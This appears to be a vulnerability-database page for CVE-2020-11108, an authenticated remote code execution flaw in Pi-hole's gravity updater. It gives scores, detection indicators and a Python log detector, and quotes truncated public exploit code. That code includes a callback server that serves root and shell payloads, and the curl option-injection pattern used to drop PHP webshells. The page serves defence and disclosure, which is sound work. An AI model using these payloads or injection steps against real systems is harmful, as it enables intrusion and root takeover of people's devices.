CVE-2020-11108
Published 2020-05-11
Priority: P1 (80, high)
CVSS 3.1: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Exploit: public (see the Exploit-DB and Metasploit entries below)
EPSS: 78.26% (99.5th percentile)
The Gravity updater in Pi-hole through 4.4 allows an authenticated adversary to upload arbitrary files. This can be abused for Remote Code Execution by writing to a PHP file in the web directory. (Also, it can be used in conjunction with the sudo rule for the www-data user to escalate privileges to root.) The code error is in gravity_DownloadBlocklistFromUrl in gravity.sh.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pi-hole | pi-hole | <= 4.4 | — |
Detection & IOCs (extracted from sources)
- Detect POST requests to /admin/settings.php?tab=blocklists whose 'newuserlists' parameter carries a curl option-injection pattern: a URL followed by -o <filename>.php -d, which writes an arbitrary PHP file into the webroot.
- Detect GET requests to /admin/scripts/pi-hole/php/gravity.sh.php from authenticated sessions, especially in rapid succession (several calls within seconds); this is how the malicious blocklist download is triggered.
- Alert on GET requests to /admin/scripts/pi-hole/php/fun.php, or to any randomly named .php file under /admin/scripts/pi-hole/php/ that did not previously exist: this is the attacker triggering the dropped webshell.
- Monitor for unexpected creation or modification of teleporter.php in the Pi-hole web admin directory; the exploit overwrites it with a root-privilege payload.
- The exploit requires the attacker-controlled HTTP server to listen on port 80 exactly; treat outbound connections from the Pi-hole host to port 80 of an unknown host during a gravity update as an indicator of exploitation.
- Look for a Pi-hole admin login followed immediately by a blocklist modification (POST to settings.php?tab=blocklists) and then repeated gravity.sh.php calls; this three-phase sequence is the exploit chain.
- Exploitation requires authentication to the Pi-hole admin interface: an attacker must hold valid credentials, or the interface must be unauthenticated. The PASSWORD option may be blank if no password is set.
- The attacker's HTTP server must be reachable by the Pi-hole host on port 80 specifically; exploitation fails if SRVPORT is not 80.
- The root privilege-escalation phase overwrites teleporter.php permanently, breaking that application feature; cleanup of the added blocklist entries must be performed manually.
- The exploit may require two consecutive gravity update requests to advance through its stages; a single gravity pull may not be sufficient to trigger payload delivery.
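The detection items above describe an access-log sequence (blocklist POST, then repeated gravity.sh.php calls, then a request to a previously non-existent .php under /admin/scripts/pi-hole/php/) plus a suspicious 'newuserlists' value. The following script is an added illustration, not code from the page or from the Pi-hole project; the log lines are constructed, the KNOWN_PHP allowlist is an assumption to be populated from a clean install, and the 10-second window is an arbitrary tuning choice.

```python
import re
from datetime import datetime, timedelta

# Constructed combined-format access-log lines for a Pi-hole host (sample data, not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [11/May/2020:10:00:02 +0000] "POST /admin/settings.php?tab=blocklists HTTP/1.1" 302 0 "-" "curl/7.64.0"
10.0.0.5 - - [11/May/2020:10:00:03 +0000] "GET /admin/scripts/pi-hole/php/gravity.sh.php HTTP/1.1" 200 2048 "-" "curl/7.64.0"
10.0.0.5 - - [11/May/2020:10:00:05 +0000] "GET /admin/scripts/pi-hole/php/gravity.sh.php HTTP/1.1" 200 2048 "-" "curl/7.64.0"
10.0.0.5 - - [11/May/2020:10:00:09 +0000] "GET /admin/scripts/pi-hole/php/fun.php HTTP/1.1" 200 17 "-" "curl/7.64.0"
10.0.0.9 - - [11/May/2020:11:30:00 +0000] "GET /admin/scripts/pi-hole/php/gravity.sh.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
PHP_DIR = "/admin/scripts/pi-hole/php/"
KNOWN_PHP = {"gravity.sh.php"}  # assumption: extend this from a clean install of the same version

def parse_line(line):
    """Parse one combined-format log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], TS_FMT)
    return ev

def blocklist_value_is_suspicious(value):
    """True when a blocklist entry has dash-prefixed tokens after the URL (curl options such as -o/-d)."""
    return re.search(r"https?://\S+\s+-{1,2}[A-Za-z]", value) is not None

def analyze(log_text, window=timedelta(seconds=10)):
    """Return alerts for: repeated gravity.sh.php calls, blocklist POST followed by them, unknown .php scripts."""
    alerts, state = [], {}
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        st = state.setdefault(ev["ip"], {"post": None, "gravity": []})
        path = ev["path"]
        if ev["method"] == "POST" and path.startswith("/admin/settings.php?tab=blocklists"):
            st["post"] = ev["ts"]  # phase 1 of the chain: blocklist modification
        elif path.startswith(PHP_DIR + "gravity.sh.php"):
            st["gravity"] = [t for t in st["gravity"] if ev["ts"] - t <= window] + [ev["ts"]]
            if len(st["gravity"]) == 2:  # report once per burst, on the second call inside the window
                alerts.append(f"{ev['ip']}: repeated gravity.sh.php within {window.seconds}s")
                if st["post"] is not None:
                    alerts.append(f"{ev['ip']}: blocklist change followed by repeated gravity pulls")
        elif path.startswith(PHP_DIR) and path.split("?", 1)[0].rsplit("/", 1)[1] not in KNOWN_PHP:
            alerts.append(f"{ev['ip']}: request to unexpected script {path}")  # possible dropped webshell
    return alerts
```

Access logs do not record POST bodies, so blocklist_value_is_suspicious is meant for a WAF or reverse-proxy log that captures the form value, while analyze works from the plain access log.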
CVSS provenance
NVD v3.1: 8.8 HIGH (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
NVD v2.0: 9.0 CRITICAL (AV:N/AC:L/Au:S/C:C/I:C/A:C)
No detection rules found.
Exploit-DB
Pi-hole 4.4.0 - Remote Code Execution (Authenticated)
CVE-2020-11108 [HIGH] · exploitdb · 2020-05-26 · CVSS 8.8
---
# Exploit Title: Pi-hole 4.4.0 - Remote Code Execution (Authenticated)
# Date: 2020-05-22
# Exploit Author: Photubias
# Vendor Advisory: [1] https://github.com/pi-hole/AdminLTE
# Version: Pi-hole .
Based (and improved on): https://github.com/Frichetten/CVE-2020-11108-PoC/blob/master/cve-2020-11108-rce.py
File name CVE-2020-11108.py
written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be
## Vulnerable setup instructions (from clean Debian 10-Buster):
> apt update && apt install -y curl
> curl -sSL https://install.pi-hole.net | bash
> pihole checkout web release/v4.3.3
> cd /etc/.pihole/ && git checkout v4.4
> pihole -r ## Select reconfigure
This is a native implementation without requirements, written in Python 3.
Works equa
Exploit-DB
Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)
CVE-2020-11108 [HIGH] · exploitdb · 2020-05-19 · CVSS 8.8
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Pi-Hole heisenbergCompensator Blocklist OS Command Execution',
'Description' => %q{
This exploits a command execution in Pi-Hole MSF_LICENSE,
'Author' =>
[
'h00die', # msf module
'Nick Frichette' # original PoC, discovery
],
'References' =>
[
['EDB', '48443'],
['EDB', '48442'],
['URL', 'https://frichetten.com/blog/cve-2020-11108-pihole-rce/'],
['URL', 'https://github.com/frichetten/CVE-2020-11108-PoC'],
['CVE', '2020-11108']
],
'Platform' => ['php'],
'Privileged' => true,
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DisclosureDat
Exploit-DB
Pi-hole < 4.4 - Authenticated Remote Code Execution / Privileges Escalation
CVE-2020-11108 · exploitdb · 2020-05-10
""" %(LOCAL_IP, LOCAL_PORT)
root_payload = """
"""
def send_response(thread_name):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((LOCAL_IP,int(80)))
sock.listen(5)
connected = False
while not connected:
conn,addr = sock.accept()
if thread_name == "T1":
print("[+] Received First Callback")
conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n")
elif thread_name == "T2":
print("[+] Received Second Callback")
print("[+] Uploading Root Payload")
conn.sendall(bytes(root_payload, "utf-8"))
elif thread_name == "T3":
print("[+] Received Third Callback")
conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n")
else:
print("[+] Received Fourth Callback")
print("[+] Uploading Shell Payload")
conn.sendall(bytes(shell_payload, "utf-8"))
conn.close()
connected = True
sock.close()
_thread.start_
Exploit-DB
Pi-hole < 4.4 - Authenticated Remote Code Execution
CVE-2020-11108 · exploitdb · 2020-05-10
""" %(LOCAL_IP, LOCAL_PORT)
def send_response(thread_name):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((LOCAL_IP,int(80)))
sock.listen(5)
connected = False
while not connected:
conn,addr = sock.accept()
if thread_name == "T1":
print("[+] Received First Callback")
conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n")
else:
print("[+] Received Second Callback")
print("[+] Uploading Payload")
conn.sendall(bytes(payload, "utf-8"))
conn.close()
connected = True
sock.close()
_thread.start_new_thread(send_response,("T1",))
# Fetch token
resp = requests.get(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, verify=False)
response = str(resp.content)
token_loc = response.find("name=\"token\"")
token = response[token_loc+20:token_loc+64]
# Make request wit
Metasploit
Pi-Hole heisenbergCompensator Blocklist OS Command Execution
This exploits a command execution in Pi-Hole <= 4.4. A new blocklist is added, and then an update is forced (gravity) to pull in the blocklist content. PHP content is then written to a file within the webroot. Phase 1 writes a sudo pihole command to launch teleporter, effectively running a priv esc. Phase 2 writes our payload to teleporter.php, overwriting the content. Lastly, the phase 1 PHP file is called in the web root, which launches our payload in teleporter.php with root privileges.
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/157623/Pi-hole-4.4-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/157624/Pi-hole-4.4-Remote-Code-Execution-Privilege-Escalation.html
- http://packetstormsecurity.com/files/157748/Pi-Hole-heisenbergCompensator-Blocklist-OS-Command-Execution.html
- http://packetstormsecurity.com/files/157839/Pi-hole-4.4.0-Remote-Code-Execution.html
- https://frichetten.com/blog/cve-2020-11108-pihole-rce/
- https://github.com/Frichetten/CVE-2020-11108-PoC